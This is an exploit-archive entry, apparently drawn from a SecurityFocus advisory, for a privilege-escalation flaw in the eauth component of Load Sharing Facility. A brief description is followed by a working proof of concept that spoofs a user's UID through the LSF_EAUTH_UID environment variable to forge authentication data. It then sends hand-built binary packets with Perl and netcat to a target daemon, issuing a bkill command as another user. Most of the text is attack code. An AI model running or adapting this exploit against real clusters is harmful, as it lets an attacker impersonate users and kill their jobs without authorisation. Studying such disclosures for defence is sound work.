34 lines
No EOL
1.6 KiB
Text
34 lines
No EOL
1.6 KiB
Text
source: https://www.securityfocus.com/bid/9724/info
|
|
|
|
Load Sharing Facility eauth component has been reported prone to privilege escalation vulnerability. The eauth component is responsible for controlling authentication procedures within Load Sharing Facility. An issue has been reported where an attacker may send commands to Load Sharing Facility as any user. The issue presents itself because eauth uses an environment variable to determine the UID of the user invoking the binary.
|
|
|
|
$cat /etc/passwd|grep cadence
|
|
cadence:x:500:500:Tomasz Grabowski:/home/cadence:/bin/bash
|
|
$ export LSF_EAUTH_UID=500
|
|
$ eauth -c hostname
|
|
,',0/%+-$%$&&,/)
|
|
|
|
Now, she needs to send packets. She can do it, for the sake of simplicity,
|
|
using Perl and NetCat software:
|
|
|
|
(
|
|
# first packet
|
|
perl -e 'print "\x04\x00\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00";
|
|
print "\x00\x00\x00\x00";
|
|
'
|
|
sleep 1;
|
|
|
|
#let's call it a header, packet length
|
|
perl -e 'print "\x00\x04\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x40";
|
|
#below we provide UID, GID and length of user name
|
|
print "\x00\x00\x00\x00\x00\x00\x03\xee\x00\x00\x03\xee\x00\x00\x00\x07";
|
|
#below is the user name, end indicator, and probably auth data field length
|
|
print "\x63\x61\x64\x65\x6e\x63\x65\x00\x00\x00\x00\x03\x00\x00\x00\x10";
|
|
#again authentication length and auth data itself
|
|
print "\x00\x00\x00\x10\x2a\x30\x26\x24\x21\x25\x2e\x23\x2c\x23\x27\x2d";
|
|
#rest of auth data, end indicator, question code (x09 - bkill) and process number
|
|
print "\x2f\x28\x2b\x25\x00\x00\x00\x02\x00\x00\x00\x09\x00\x00\x00\x77";
|
|
print "\x00\x00\x00\x00";
|
|
'
|
|
#send it to the target daemon
|
|
) | nc 192.168.10.106 6881 |